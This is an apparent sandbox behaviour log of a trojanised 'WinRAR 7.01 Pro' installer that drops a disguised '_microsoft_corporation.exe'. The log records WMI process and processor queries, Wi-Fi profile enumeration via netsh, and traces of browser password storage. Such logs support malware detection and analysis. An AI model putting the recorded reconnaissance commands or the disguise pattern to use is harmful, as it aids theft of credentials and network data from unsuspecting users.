          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: tmp2186.tmp.dat.3.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: WinRAR 7.01 Pro.exeReversingLabs: Detection: 44%
          Source: unknownProcess created: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe "C:\Users\user\Desktop\WinRAR 7.01 Pro.exe"
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeProcess created: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe "C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe"
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeProcess created: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe "C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe"
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeProcess created: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe "C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe" Jump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeProcess created: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe "C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssidJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeSection loaded: dlnashext.dllJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeSection loaded: wpdshext.dllJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: dxgidebug.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: dataexchange.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: d3d11.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: dcomp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: msiso.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: mshtml.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: srpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: msimtf.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: d2d1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: d3d10warp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: dxcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: uiautomationcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: explorerframe.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: thumbcache.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: samlib.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: networkexplorer.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: ehstorshell.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: cscui.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: ntasn1.dllJump to behavior
